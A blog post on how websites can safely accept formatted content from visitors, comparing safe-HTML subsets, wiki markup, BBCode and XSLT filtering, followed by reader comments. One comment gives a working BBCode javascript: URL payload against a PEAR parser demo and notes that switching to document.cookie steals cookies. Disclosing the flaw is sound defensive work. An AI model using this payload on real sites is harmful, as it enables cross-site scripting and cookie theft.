Handling content from strangers

One thing that makes web development both fascinating and exhausting is how the same subjects keep popping up, over and over, without resulting in any clear answers. One the one hand it’s remarkably easy to put up your own website. But building a site capable of handling a lot of traffic, and is easy to change and modify is not so easy.

What’s got me started is this recent blog by Sam Ruby, owner of the job to die for, at IBM, to whom PHP can thank for the Java extension, who’s been a member of the Apache group and has had a part countless other web innovations and groups.

The issue? How to publish content submitted to your site by it’s visitors. Solving this is one is as old as that most dated of web apps – the Guestbook and if you trawl through the comments on Sam’s site, you’ll quickly get the idea that still, no ones too sure of the answer.

The basic problem, as you no doubt know, is to allow visitors to your blog or forum to submit more that just plain, unformatted text, you need to allow them some kind of mechanism to add structure. But if you give them access the entire HTML vocab (plus Javascript and CSS), not only will your site be an ever changing mess but you’ll also potentially be exposing visitors to things like XSS exploits (side note – Chris Shifflet: Foiling Cross-Site Attacks).

Been developing a fetish recently for knocking up lists for describing common development problems, as a means to really nail it down. Here’s a guess at what a good solution to this problem needs to do (subject to my opinion / limited vision);

Good Smells

1. Prevents the structure of your site from being broken

2. Poses no threat to your site’s or it’s visitors security

3. Provides visitors with enough power, in terms of how they are able to format their submissions, to be happy.

4. Is easy to parse (extracting submitted formatting and handling it should not require a PhD)

5. Is easy to use. Believe it or not, there are people “out there” who have no idea of HTML.

6. Preserves the intent of the formatting. Not quite sure how to explain what I mean here but the thought test might be: “Is it possible to transform submitted content to other output types?” – i.e. is generating a PDF document, as opposed to HTML, at least feasible.

Any more / less?

Meeting all those requirements is probably an impossibility – it’s going to be a compromise at some level.

Some of the common solutions, off the top of my head, to solving this are;

Common Styles

a. Allowing a limited subset of “safe” HTML. This addresses points 3. and 6. pretty well and, assuming a basic knowledge of HTML, places no additional requirements on users to learn new markup syntaxes. Also on the plus side (depending on your point of view) is there’s plenty of WYSIWYG “plugins” these days, such as Editize or JavaScript based solutions. The downside is it’s very easy to get wrong, particularly in terms of security (see PHP’s strip_tags() function and the comments that follow on “evil attributes”). The other problem is how to parse it? Unless you require users submit well formed XML, your standard XML parser will choke on HTML. Using regular expressions to parse HTML is often a recipe for nightmares. Most languages used on the web have evolved an HTML capable parser or two by now although. That said, it’s almost shocking that PHP, in particular, has come so far with, essentially, no built in HTML parser (thankfully PHP5 brings HTML Tidy to the fray, plus the DOM extension can now handle HTML.

b. Wiki style. Using “markup” like *this for bold* and _this for italic_. Wiki style often starts out well, being easy to use and secure but is perhaps weak on point 3. But things go down hill the more formatting options you provide to users, the parsing getting progressively harder to manage and the syntax weirder like !!!this for some large text. Users are required to learn this alien markup and may find it difficult to express their precise formatting intent (intent thereby being lost of becoming arbitrary as text like McDougals gets automatically assigned as a link to a new wiki page). In the end, I don’t think wikis do much to address those beyond their original target audience – software developers (flame on…)

c. Implied formatting. This is less frequently used as standalone mechanism but turns up often as part of other styles. Essentially whitespace takes on a meaning it doesn’t normally have with HTML. PHP offers nl2br() for example. It’s definitely easy to use and fairly safe (depending on what you do with URLs, for example). It’s also easy to parse. Where it fails is it typically offers little power to the user and it’s very easy to lose the intent of the formatting, hence it’s often augmented with one or more of the other styles.

d. BBCode style. Essentially use your own custom markup; one which will be ignored by web browsers completely, should any un parsed fragments turn up in the finished page. Although this can be a little tricky for users have never run into it before, it’s a tried, tested and successful, as forums apps like vBulletin and phpBB have proved, to the point where BBCode is almost (an unwritten) standard. Surprisingly, on Sams blog, no one mentioned it but perhaps that reflects the common divide between PHP developers and the rest of the web; doing it vs. talking about it. For end users, it generally means that based HTML tags have been translated more or less one to one to BBCode – simply replace < with [, so if you know HTML, you'll probably be fairly happy. You also have the option, as Sitepoint have done, of introducing your own markup, like the "Google" tag. Parsing is bearable and formatting intent can be clearly expressed and preserved. For me, it's the way to go, but that's me.

Any more?

One notable hybrid of all is textile markup, which throws in a little everything. Those times I’ve been subjected to it, the result was “Yuck!”. Another hybrid seems to be Markdown.

Practical Notes

Couple of quick points, outside of security issues;

- When storing visitor submitted content in a database, for later display, apply the parsing operations after the content has been stored, not before. In other words, don’t parse, INSERT then SELECT but INSERT, SELECT then parse (if performance is an issue, cache the HTML resulting from the parse). The basic reason for this is it makes editing the content later (either by you as a site admin or by the visitor themselves) easy – you display their content (more or less) as is in a textarea rather than having to reverse the parsing operation to give them back what they started with (a recipe for headaches). You also stand a better chance of preserving the intent of the formatting, which is easy to lose if you’re required to reverse the parsing. You might consider filtering the content before storing it – certainly for SQL injections and possibly for stuff like “bad word filters” but don’t transform or add to the content.

- Document your markup. The number of blogs I see that expect visitors to guess (nudge nudge Sitepoint ;))…

Any more?

While I’m here, some PEAR projects that can help in this area;

- PEAR::HTML_BBCodeParser – you don’t even need to write your own (this has even become a WACT Tag). Note stuff like converting HTML entities and handling linefeeds is still your job.

- PEAR::Text_Wiki – in effect, and abstraction layer for WIKI markup. Text_Wiki “captures” all the common document structuring requirements, end users may have, as “rules” and can translate whatever markup you like to those rules, the rules rendering (X)HTML. Very clever project. Would also work as a BBCode parser (and pretty much anything else in fact).

- XML_HTMLSax – a SAX parser which won’t choke on HTML (badly formed XML). In fact the name HTMLSax is a little misleading, as it has no specific knowledge of HTML vocab. In fact it’s much like Pythons HTMLParser although tags which are closed implicitly, like
result in a four argument to the open tag handler with XML_HTMLSax, as well as a call to the close handler, while Python;s HTMLParser has a “startendtag” callback for this situation. A couple of projects I’ve seen but never tried is HTML Parser for PHP-4, which provides a state based API and PHP HTML Parser, which does have some knowledge of HTML and seems to designed to transform HTML is a single pass (from the user point of view). Note also Simple Test has a (you guessed it) simple SAX based parser for HTML – it uses regular expressions, based on the Lexer in lamplib – still need to benchmark it against HTMLSax which uses a string position based approach to parsing, just for interest.

Anyway – long rant. Enough already.

Free book: Jump Start HTML5 Basics

Grab a free copy of one our latest ebooks! Packed with hints and tips on HTML5's most powerful new features.

  • sleepeasy

    I was thinking about the very same thing while I was trying to get to sleep last night.

    What I thought of was using XML. Define a set of XML elements, probably a subset of XHTML elements, ie

    , and . When the user submits his/her content try and load it into DomDocument. If the content isn’t well formed XML then the previous step will fail, and at that point notify the user that they had some errors in what they submitted. If it loads, good.

    Next, validate the XML with using a very simple XSchema that defines the allowed elements (this XSchema could be extended or whatever to add supported elements as required).

    If this fails notify the client (again) otherwise all is well, stick it in your database.

    I haven’t thought about it that much, but I think it could work this way.

    I hope :)

  • http://www.phppatterns.com HarryF

    What I thought of was using XML. Define a set of XML elements, probably a subset of XHTML elements

    One further problem requiring well formed XML though is should users post like this;


    < ?xml version="1.0"?>

    Here is a link

    Or like this

    Here is a link

    You attach the XML processing instruction for them but what they’re submitting is, technically, no longer well formed.

    And what about this;

    Here is a link

    Here is another link

    An XML document can only have one root node. The above implies you’re making the root node for them – what they’re submitting is even less well formed….

  • sleepeasy

    ” An XML document can only have one root node. The above implies you’re making the root node for them – what they’re submitting is even less well formed…. “

    OK, point taken – however the method I outlined above would still be viable:


    $message = new DomDocument('1.0');
    $content = '' . $_POST['content'] . '';
    $message->loadXML($content); // Catch any errors
    $message->schemaValidate('message.xsd'); // And again

    Personally, I would want to attach other (meta)data of some description along with the submitted content to form the “whole” message. ie:

    instead of simply:


    content text here

    I’d want:



    45

    ...

    content goes here

    $message = new DomDocument('1.0');
    $content = '' . $_POST['content'] . '';
    $message->loadXML($content); // Catch any errors
    $message->schemaValidate('message.xsd'); // And again

    $capsule = new DomDocument('1.0');
    $capsule->appendChild(new DomElement('author', Visitor::instance()->getId())); // ...
    $capsule->documentElement->appendChild($capsule->importNode($content->documentElement, TRUE));
    // Save or whatever.

    I don’t see ” making the root node for them ” as a problem.

    I think SitePoint should really make these textarea’s for the blog comments bigger. Or maybe they’re trying to tell me something :)

  • http://www.jeroenmulder.com/ JMulder

    What a coincidence! Not too long ago I had a discussion on this with a good friend, specifically about the ‘when’ of parsing the content.

    In his current project he build an encoding and decoding method and used the encoding before storing the user’s content in the database and for whatever reason ever, he could use decoding. This was done in the light of performance, which I can totally understand.

    I am in favour of parsing the content after selecting for the same reasons as you mentioned. Another reason is that to me it doesn’t sound right to store altered content in a database. I want to store the content as true as possible in the database and then worry about presentational matters later. Parsing before INSERT could give you problems if you wish to use two different methods for displaying the content (screen and print maybe?).

    I second the use of BBCode. It’s good stuff ;)

    Boy. Got to love comments that don’t make a point. I’ll end my ranting right now, it’s early in the morning :p

  • http://www.phppatterns.com HarryF

    I don’t see ” making the root node for them ” as a problem.

    Agreed it’s not a train smash but can be confusing to users in some cases. Believe Simon uses the approach on his blog, and may have some more insight.

    the ‘when’ of parsing the content

    Guess to an extent this is a contentious issue – my view is like yours – preserve the raw data and keep it simple. Has you friend considered caching the parsed content, as a way to keep performance?

  • Alec

    Maybe this is equivalent to what sleepeasy was saying, but you could allow html and process it with XSLT (creating the root node for them, of course). Then your xsl just needs to have statements reflecting the allowable tags and attributes.

    For instance, to allow a tag you’d have (I’m supposed to use vB code here, right? nudge, nudge):




    If someone submitted:

    Hello there

    it would stay the same, but if they submitted

    Hello there

    the style attribute would be stripped out.

    To allow links, but only with full web-page urls (no ftp, no tricky javascript or relative links), you could use:









    (I think: I only just started messing around with XSLT after installing php 5 the other day.)

    Basically any tags you don’t match are left out, as are any attributes you don’t match. If the input is so wild it won’t even parse, it’s because the user really messed something up, like not closing a tag: you tell them to try again. You could reduce that possibility by running Tidy on it first, too.

    I don’t like BBCode because it doesn’t seem to be any easier to use/learn than html and it doesn’t have any practical uses outside of posting to discussion boards. I feel like allowing html instead contributes to web-literacy or something. Also, I’m not convinced that the pear BBCode parser isn’t vulnerable to javascript insertion. At the least, it seems really easy to get some wacky output. You can try different things here:

    http://nautadereede.nl/parser/parser.php

  • http://www.sitepoint.com/ mmj

    By coincidence, I’ve been working on the same sort of problem just recently in a project of my own. When fitting a rich text editor into a form, I realised that I needed some way to ensure that the content submitted contained no script (javascript, etc) and no styles, and that it was XHTML strict compliant.

    Doing the first two alone is relatively easy, but for the third I built myself a complete HTML parser which is capable of ‘hinting’, that is – it assumes the input is nowhere near XHTML strict compliant, and it goes through the document element by element converting it to its XHTML strict equivalent. For an example of where ‘hinting’ is necessary, consider the fact that XHTML does not allow you to place text some tags, such as or

    . Well, the script I wrote will hint this text by dropping it inside a paragraph element. This includes checking all elements and their children, and elements and their attributes, against the XHTML allowed children and allowed attributes. It also then goes over the document a couple of times to clean up things that we often do badly like paragraph tags.

    It means that I can let a user submit any raw HTML he wants, and it will be filtered into nice strict XHTML. This negates the need for a more limited, informal markup such as a wiki markup or bbcode, and it means that users can post complex things like nested lists, tables, images, and whatever.

    The data that I store in the database is then valid XHTML, so when I want to display it, it needs no further parsing. However, because it is XML complaint, if I did want to further parse it, I can do it easily and quickly with the DOM or with XSLT. This is something that couldn’t be done with, say, bbcode. Having the data stored as valid XHTML makes all of this relatively easy. The notion of having a proprietary XML format with just limited tags makes sense too, but when the data being stored is essentially ‘formatted text’, then it makes more sense to use XHTML itself.

  • http://simon.incutio.com/ Skunk

    My blog enforces valid XHTML in the comments and restricts the user to a small subset of non-harmful tags and attributes. I get around the requried root problem by wrapping entries in a made up element before validating them, and a

    element when they are displayed on the page. Of course, this means I don’t have valid XML in the database table for entries without a root element which isn’t really a problem but does rule out the possibility of running crazy XML database extensions in the future. That said, it’s a ten minute job to write a script that goes through my database and adds a root node around everything so it isn’t really a problem.

    From a usability point of view, this solution is terrible. I can almost get away with it because my blog is very much skewed towards standards based web development and I can safely assume most of my readers will know HTML. Even so, I still lose comments – just a few days ago someone was trying to post a code sample with an unescaped ampersand in it, couldn’t figure out why it wouldn’t let him, and gave up. That’s just not acceptable and making my system less draconian (while still ensuring I end up with well formed XHTML) has been added to my to-do list.

    There are enough solutions to the how-to-accept-user-input problem that sites should be able to pick one that fits their needs. The absolute simplest is just to escape all user input using htmlspecialchars() (or equivalent) – and not doing so is inexcusable as it’s an instant cross site scripting vulnerability.

    Great discussion!

  • http://www.phppatterns.com HarryF

    [QUOTE=Anonymous]
    Basically any tags you don’t match are left out, as are any attributes you don’t match. If the input is so wild it won’t even parse, it’s because the user really messed something up, like not closing a tag: you tell them to try again. You could reduce that possibility by running Tidy on it first, too.
    [/QUOTE]

    Very cool tip.

    I don’t like BBCode because it doesn’t seem to be any easier to use/learn than html and it doesn’t have any practical uses outside of posting to discussion boards. I feel like allowing html instead contributes to web-literacy or something.

    Can see your angle. As you spotted (nudge nudge SP) this blog uses BBCode though and generates respectable enought XHTML. For me BBcode works well when you need and as to implement solution that (should) be reliable, secure and preserves the formatting intent (so you can make XHTML out of it).

    But you’re idea with Tidy + XSLT is excellent – may be the way to go with PHP5 – sloppy HTML is still possible for the user but the result is XHTML.

    Also, I’m not convinced that the pear BBCode parser isn’t vulnerable to javascript insertion. At the least, it seems really easy to get some wacky output.

    That’s also what I’m referring to about PHP developers “doing it” instead of talking about it (myself included).

    Just been checking and you’re right – try the following BBCode on that test page;


    // Replace { } with BBcode brackets...
    {url=javascript:location.replace("http://www.google.com/search?q="+document.domain);}Test{/url}

    Replace “document.domain” with “document.cookie” and XSS here we come… Someone needs to get to the author on that. Note the other wierdness is the example page doesn’t replace XML Entities – he leaves that up to you, the classes user (which may also be the angle on filtering for XSS).

  • Moritz Angermann

    Parse it all with XSL! :)

    I’ve written (basically inspired by this article. And because I was looking for some soluton for my site: http://mdot.mine.nu) a Plain-Text-Markup-Parser in XSL.

    It takes text like the Markdown and Textism style. And transforms it into valid HTML.

    More can be found here:
    http://mdot.mine.nu/projects/mml/

    kindest regards,
    Moritz “neofeed” Angermann

  • http://nokia6630.info warren

    Thanks for the special work and information! nokia6630

  • violet

    Your site is great

  • http://www.webfreefind.com toni

    Holla and Happy Thanksgiving. nokia6630

  • Chris

    Time to end the bold.

  • Chris

    Oh well. I tried.